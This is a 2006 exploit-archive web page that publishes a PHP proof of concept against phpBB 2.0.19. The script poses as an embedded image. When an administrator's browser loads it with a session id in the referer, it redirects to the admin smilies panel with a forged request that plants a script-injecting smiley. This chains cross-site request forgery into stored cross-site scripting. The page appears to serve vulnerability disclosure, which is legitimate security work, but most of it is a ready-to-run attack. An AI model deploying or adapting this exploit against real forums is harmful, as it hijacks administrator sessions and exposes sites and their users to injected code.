Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research
WLB

WLB Database

Send to WLB

About WLB
RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP
Corporate

Contact

About us
Services

SecurePHP
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Details : SecurityReason Exploit

  Topic : phpBB 2.0.19 CSRF Image
  ExploitAlert : 6
  Credit : Maksymilian Arciemowicz
  Date : 8.2.2006

  Download

  Exploit Code :  

<?php
# SecurityReason.Com writed by Maksymilian Arciemowicz
# http://securityreason.com/achievement_securityalert/31 or GPG
http://securityreason.com/achievement_securityalert/31/1
#
# post :x: to see xss OR set request for admin

$sid='';
$url = parse_url(getenv('HTTP_REFERER'));

preg_match('/(\/.*)\//', $url['path'], $path);
preg_match('#sid\=?([0-9a-z]*)#i', $url['query'], $sid);

if($sid[1]==""){

$image="R0lGODlhUABQAIcAAAAAAAEBAQMDAwQEBAYGBgcHBwgICAkJCQoKCgsLCwwMDA0
NDQ4ODhAQEBERERISEhMTExUVFRgYGBoaGhsbGxwcHB0dHR4eHh8fHyAgICEhISIiIiMjIyQ
kJCUlJSYmJicnJygoKCkpKSoqKisrKywsLC0tLS4uLi8vLzAwMDIyMjMzMzY2Njg4ODw8PEB
AQEJCQkREREVFRUZGRkdHR0pKSktLS0xMTE1NTU9PT1FRUVNTU1RUVFZWVldXV1lZWVpaWlt
bW11dXV5eXmFhYWJiYmNjY2VlZWZmZmhoaGlpaWxsbG1tbW5ubm9vb3FxcXJycnV1dXd3d3h
4eHl5eXt7e35+fu4CAu4EBO4FBe4HB+4LC+4NDe4ODu8SEu8UFO8VFe8ZGe8cHO8eHvAiIvA
kJPAnJ/AsLPEuLvE4OPI9PfJBQfJDQ/JLS/NOTvNPT/NRUfNSUvNXV/NYWPRbW/RdXfRiYvR
mZvVra/VtbfV3d/Z5eYKCgoSEhIeHh4qKioyMjI6Ojo+Pj5GRkZOTk5aWlpeXl5iYmJmZmZq
amp2dnZ6enp+fn6CgoKGhoaKioqOjo6SkpKampqioqKmpqaurq66urrCwsLKysrOzs7S0tLe
3t7i4uLm5ubq6uru7u729vb6+vr+/v/aCgvaGhvePj/eTk/iWlviXl/idnfienvikpPmoqPm
pqfmqqvmsrPmysvq1tfq/v8DAwMLCwsPDw8TExMfHx8jIyMnJycrKysvLy8zMzM3Nzc7Ozs/
Pz9DQ0NHR0dTU1NXV1dbW1tfX19nZ2dra2tvb293d3d7e3vrAwPvDw/vLy/vOzvzS0vzU1Pz
W1vzX1/zZ2fza2vzb2/zd3eDg4OHh4eLi4uTk5Obm5ufn5+rq6uvr6+zs7O7u7u/v7/zg4P3
i4v3n5/3u7vDw8PHx8fLy8vT09PX19ff39/7w8P7x8f7y8v709P719fn5+fv7+/75+f77+/z
8/P78/P7+/v///wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAP8ALAAAAABQAFAAAAj/APE
JHEiwoMGDCBMqXMiwocOHECNKnEixosWLGDNq3MixY0RFRGp5FKhu0hEiKJdE8jayIBEAi0b
Ga3LABREYEwIEgNSSIEiR+H5q1ISACTh864zZgNkT4cuYGZcAMDQwHJWQAuPVInTkTzKCJU/
6WXRMqEChIEHNWhISrQcANolgcjLl3EBORCg5lPqhD6Zi6AjGg5IBhw8JJmZlpUmDSAoBi54
OlPzyAwMAMCUrehs3VA4Cl7LmQPDJ4a4XBAAMgMAiEDeBtRoAkncvE4MXdjkh2BGY2KJbkgV
SBpACZcjgwfFJGvBDHr5eDnA/PDepSIsJBgLcsOtnwA2UQRoQ/8iEbwqARC6ZCmf6Ev1k9cm
5kZAgDN+fAIomplPmKQWBTfi8FJdxIiW3HlQBsqfegQwOFAUAfqjzQgfZPAQSgAKtA4MDvdg
HgCAEnWMOPn6clx6CwyGYIFQG1sKACpgw0MQ9DxFRwCHf3KNOJhEgEQ8+wlDAwSfyUPdCJPj
oIoEO2dQjDCS3SLWEOudk4oKCKgZ3BACBOEdSDASUwABQDk2xAAIk+PCCBUBcI9A9lryAAQ4
uKPDCL/jcg4gFHeBwwQOQ4PIBAi/UIEQLWBIUnCUURIADVkEFAEAM6kB0Ti6OLKJpLT+GKIq
mmdj1pjCZYhLMUcNkymktZOHD6jEEvf86aqat4oNNBgNI0tSuB0FHwmu8BiuQeVMIK2w9nTi
ijbHMNuvss9AmlIod1FKbxzL2RKuRHVeoQe0cYniBCo3aXsStKm82U8YY1ZRr7hXovjkHFrA
MpBVXXvlkHBGDAIvPMFUQcUQhtiyLj1Z+HKGIwUERAUotUxBRhZsUnTsQPGt8AU1WhBmGmGJ
noTSECgPI0M2/Ikjggw8pTNDIwVBU0AMRKqCAy3o4sDVDAD1UOpHF9IxDChdwwAObbLTZJl1
B2pCMCT5VACDFOfecMwueLi5RDz6zMODDjy9RhU82GiAgSsXd2uEGGVe8Qc5A3X1HRHjjCTT
LSShtwNQgATD/wEIUnApUIlTosABBfcHJg8OCEXHrrR1ydGHGM+8NiJJIvHDgQAtDEPFWTNz
4kBoADBhhV3JBCPB0cgZCZDE+9pzSBRviCPTHhyGOaB4f6TS4IyE/LFAAKB66B44KFiCz4ns
qug7vQPbsgYUd7gApJJFGIrllhPHMkgJTm+SSYzIooLBskDt4cw8kBDxBI+uMOx+vQO7gocU
e9sApJ5124jkLCg14wQ1GQAGmWAEEJuABCSxQiTcx4gQr4AEI2tSg5U2EGaqgRkHc4YpXvEM
g5/jUIkI1EG1MYhGOEAYtWrUOZJwwheQSiAkXETjY1MpVN3SXDnfIwx768IdADKIQ/4dIxCI
a8YhITCKzwJGJRUSMCEtIhCNycZSCTKtaWLTDHVjRDndxIxAqGB1mxrgAFSiBGATh1hXWyEY
2amENy9DWNWIgqTHa0Y4qUmMb93gFNEwDWup4yR0HiZk88vGQdJjHs0SBgDESIE1EGEILQsC
AOhqSjY8DVxu/II1nEcKOUsiRQNLxDWAEggQBuOQa43UPdbExC/Vy1pbGKIUqMm0QZMKHHp8
nrzay4lklcqQKooAJZfQuIbucH8bY2AVnPCsTYhzjACbQAiVEAhkxHEgy8RE0UmyBjWd4m7P
OUQNCjjEAFpiCvwSyS2+trY1YKEW0rkGEaA4yADJY5y4Pef+FNpRDWyV5wQLMCYAABCKN/GR
jHKyhw0spYgkw0IAB7vgrbSZ0jaPIVg/XsQ1P6KCOADAA8djZRjXUAQxt9EIsouUIRWDzINs
gwRjNZlE2quIeptBCG/0ILSKg0wiR8MU21oGP/TxCAmMkwTdqukp8wEMOe5SD0ZwlyIIuQAM
wkOQEBjBGAVAhhtvExzTQ0EYtmCKbwqoqQTHTg8AwlZf4aEUX2hgGWTgrCWvFDAOA8BWE2hR
6ethjGmrHLGP8AQcTSMAdAwABH8yiU35t6kDIsYY92mGqzJKHMm5BK01NQhiQLQgGVUFaDRI
kGqRN7SrYocTWuva1sI2tbGdL29oG2va2QgwIADs=";

header('Content-type: image/gif');

echo base64_decode($image);
exit;

} else {

header("Location:
".$url['scheme']."://".$url['host'].$path[0]."admin_smilies.php?mode=sav
enew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c\"%20onmou
seover=\"alert('SecurityReason.Com')\"%20&sid=".$sid[1]); # REQUEST!

}
?>
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.
Apache rss

» Apache-SSL memory
   disclosure

» Apache mod_negotiation
   Xss and Http Response
   Splitting

» Apache (mod_status)
   Refresh Header - Open
   Redirector (XSS)

» Apache (mod_proxy_ftp)
   Undefined Charset UTF-7
   XSS Vulnerability
PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass
Copyright © SecurityReason. All Rights Reserved.